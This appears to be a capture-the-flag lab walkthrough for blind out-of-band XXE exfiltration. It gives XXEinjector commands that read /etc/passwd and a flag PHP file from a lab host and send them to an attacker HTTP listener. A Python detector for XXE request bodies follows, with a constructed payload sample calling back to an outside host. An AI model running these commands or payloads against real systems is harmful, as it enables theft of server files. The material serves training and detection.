Blind Data Exfiltration

Use blind (out-of-band) XXE data exfiltration on the '/blind' page to read the contents of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and retrieve the flag.

Form: http://10.129.202.84/blind/

Intercept the POST request after submitting the form

Remove the form inputs from the request body and end the request with the XXEINJECT marker on its own line at the bottom (XXEinjector replaces this marker with its payload).

Save the edited request to a file, e.g. xxe.req.

ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/etc/passwd --oob=http --phpfilter

XXEinjector writes the retrieved file contents (here /etc/passwd) to its Logs folder.

Then read /327a6c4304ad5938eaf0efb6cc3e53dc.php the same way:

ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter
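The commands above only work because the server's XML parser resolves external and parameter entities from a client-supplied DTD; the exfiltrated file leaves as a php://filter base64 string inside an entity that points at the attacker's HTTP listener. That payload shape is easy to recognise in request logs. The following detection helper is an added example, not part of this write-up or of XXEinjector: it classifies XML request bodies by XXE indicators and reports remote hosts referenced from inside the DTD (the out-of-band callback destinations). The sample bodies, the paths and the host 203.0.113.5:8000 are constructed.

```python
"""Classify XML request bodies by XXE indicators so blind/out-of-band
exfiltration attempts can be alerted on from proxy or WAF logs.
Added illustration; the sample requests below are constructed."""
import re

# Each pattern is individually suspicious in a client-supplied XML document.
INDICATORS = {
    # any DTD at all: application XML from a client should never carry one
    "doctype": re.compile(r"<!DOCTYPE\b", re.IGNORECASE),
    # entity declaration that loads an external resource
    "external_entity": re.compile(r"<!ENTITY\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.IGNORECASE),
    # parameter entity (% name): the building block of blind/OOB payloads
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.IGNORECASE),
    # PHP stream wrapper that base64-encodes a file so it survives as entity text
    "php_filter": re.compile(r"php://filter", re.IGNORECASE),
    # direct local file read
    "file_uri": re.compile(r"\bfile://", re.IGNORECASE),
}
REMOTE_URI = re.compile(r"https?://([^/\"'\s>]+)", re.IGNORECASE)


def extract_dtd(body):
    """Return the DOCTYPE declaration including its internal subset, or ''."""
    m = re.search(r"<!DOCTYPE", body, re.IGNORECASE)
    if not m:
        return ""
    start = m.start()
    first_close = body.find(">", start)
    if first_close < 0:
        return body[start:]
    # an internal subset opens with '[' before the first '>' and ends at ']>'
    bracket = body.find("[", start, first_close)
    if bracket >= 0:
        end = body.find("]>", bracket)
        return body[start:end + 2] if end >= 0 else body[start:]
    return body[start:first_close + 1]


def analyze_xml_body(body):
    """Return matched indicator names, remote hosts referenced from the DTD,
    and a verdict: clean, dtd_only, xxe or oob_xxe."""
    matched = [name for name, rx in INDICATORS.items() if rx.search(body)]
    # Only hosts inside the DTD count: an OOB payload must place its callback
    # there, whereas URLs in ordinary element text are legitimate data.
    hosts = sorted(set(REMOTE_URI.findall(extract_dtd(body))))
    if hosts and ("external_entity" in matched or "parameter_entity" in matched):
        verdict = "oob_xxe"
    elif any(n in matched for n in ("external_entity", "parameter_entity",
                                    "php_filter", "file_uri")):
        verdict = "xxe"
    elif "doctype" in matched:
        verdict = "dtd_only"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": matched, "remote_hosts": hosts}


def scan_requests(requests):
    """requests: iterable of (path, body). Returns alerts for non-clean bodies."""
    alerts = []
    for path, body in requests:
        result = analyze_xml_body(body)
        if result["verdict"] != "clean":
            alerts.append((path, result["verdict"], result["remote_hosts"]))
    return alerts


# Constructed sample bodies (not captured traffic).
BENIGN = ('<?xml version="1.0"?><root><name>alice</name>'
          '<site>http://example.com/page</site></root>')
DTD_ONLY = '<!DOCTYPE root [<!ENTITY greet "hello">]><root>&greet;</root>'
LOCAL_XXE = ('<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             '<root><name>&xxe;</name></root>')
OOB_BLIND = ('<?xml version="1.0"?>\n<!DOCTYPE root [\n'
             '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">\n'
             '<!ENTITY % dtd SYSTEM "http://203.0.113.5:8000/xxe.dtd">\n'
             '%dtd;\n]>\n<root><name>test</name></root>')
SAMPLE_REQUESTS = [("/blind/", BENIGN), ("/blind/", DTD_ONLY),
                   ("/blind/", LOCAL_XXE), ("/blind/", OOB_BLIND)]

if __name__ == "__main__":
    for path, verdict, hosts in scan_requests(SAMPLE_REQUESTS):
        print(f"{path} {verdict} callback_hosts={hosts}")
```

In practice you would feed the request bodies from the proxy or application log, alert on any verdict other than clean, and treat the remote hosts from an oob_xxe result as egress destinations to block. The real fix is on the parser side: do not resolve external entities or load external DTDs for client-supplied XML at all.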
